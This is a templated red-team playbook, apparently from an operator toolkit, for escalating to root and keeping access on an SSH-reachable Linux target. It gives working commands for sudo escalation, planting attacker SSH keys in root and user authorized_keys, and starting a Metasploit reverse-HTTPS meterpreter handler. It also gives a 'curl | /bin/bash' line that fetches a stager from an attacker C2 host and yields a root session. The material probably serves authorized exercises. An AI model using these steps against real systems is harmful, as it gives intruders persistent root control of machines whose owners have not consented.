# Access

[TOC]

## Vars

| Variable          | Value                 | Description |
| --------          | ----------            | ----------- |
| TARGET            | {{TARGET}}            | The target running SSH |
| TARGET_USER       | {{TARGET_USER}}       | The SSH user on the target system |
| TARGET_PASS       | {{TARGET_PASS}}       | The SSH password on the target system |
| LHOST_MSF         | {{LHOST_MSF}}         | C2 IP used by metasploit (HTTPs) |
| LHOST_SHARE_MSF   | {{LHOST_SHARE_MSF}}   | C2 IP used to serve meterpreter payload (HTTPs) |
| LHOST_SHARE_STG   | {{LHOST_SHARE_STG}}   | C2 IP used to serve bash stager (HTTPs) |
| PHOST             | {{PHOST}}             | Proxy IP used to connect to TARGET |
| HOSTNAME          | {{HOSTNAME}}          | Your system's hostname, determined by `shell_exec` |

## Description

Example play showing basic privesc and persistence on `{{TARGET}}`

## Steps

### Prereqs

* Use [access](access.md) to gain a shell on `{{TARGET}}` as the `{{TARGET_USER}}` user, over SSH.


### Become Root

`{{TARGET_USER}}` is a `sudoer`, so privesc to root is trivial

In your target shell:

```bash
sudo -i
```
Password:
```bash
password
```

### Verify Access

```bash
id
```

### Drop Keys


#### Prepare Key

Local, Kali shell:

```bash
mkdir -p /opt/rtfm/keys/{{TARGET}}/
ssh-keygen -C '' -N '' -f /opt/rtfm/keys/{{TARGET}}/id_rsa
```

Build a command you will paste later.
The output that is printed is the command you will paste later
```bash
{{CURRENT_DIR}}/persist_key.sh
```

#### Drop Key (`root`)

Target shell (`root`).

Authorize your key (`/opt/rtfm/keys/{{TARGET}}/id_rsa` for `root@{{TARGET}}`).

**MANUALLY MODIFY**
```bash
# PASTE command you generated above
# It should look like:
# echo ssh-... >> ~/.ssh/authorized_keys
```

#### Drop Key (`target`)

Target shell (`root`).

Drop from `root` shell to `target` shell
```bash
su -- target
```

Authorize your key (`/opt/rtfm/keys/{{TARGET}}/id_rsa` for `target@{{TARGET}}`).

**MANUALLY MODIFY**

```bash
# PASTE command you generated above
# It should look like:
# echo ssh-... >> ~/.ssh/authorized_keys
```

### Test Keys

#### `target`

New shell (Kali).

```bash
AVN_NET={{PHOST}} .proxy-ssh -i /opt/rtfm/keys/{{TARGET}}/id_rsa root@{{TARGET}}
```

Authentication should succeed, providing `root` shell.

#### `root`

New shell (Kali).

```bash
AVN_NET={{PHOST}} .proxy-ssh -i /opt/rtfm/keys/{{TARGET}}/id_rsa target@{{TARGET}}
```

Authentication should succeed, providing `target` shell.


### Drop Meterpreter

#### Setup (Kali)
Kali shell.


##### Setup (`msf`)

This terminal will generate a meterpreter payload and start the handler.

```bash
AVN_CN={{CODENAME_MSF}} autovnet rtfm msf reverse -n {{LHOST_MSF}} -p linux/x64/meterpreter_reverse_https -f elf
```

##### Setup (Payload Server)

In a new terminal, start a file server to serve the payload.

```bash
autovnet rtfm share -n {{LHOST_SHARE_MSF}} --msf {{CODENAME_MSF}}
```
**Wait for `[+] Waiting for requests...` output**

##### Setup (Staging Server)

In a new terminal, start a file server to serve the `bash` stager.

```bash
AVN_CN={{CODENAME_STG}} autovnet rtfm share -n {{LHOST_SHARE_STG}} {{CURRENT_DIR}}/stage.sh
```

**Wait for `[+] Waiting for requests...` output**

#### Deploy (Target)

Use a previous `root` shell (SSH) to {{TARGET}}.

```bash
curl -k https://{{LHOST_SHARE_STG}}/stage.sh | /bin/bash
```

You should receive a meterpreter session, running as root.
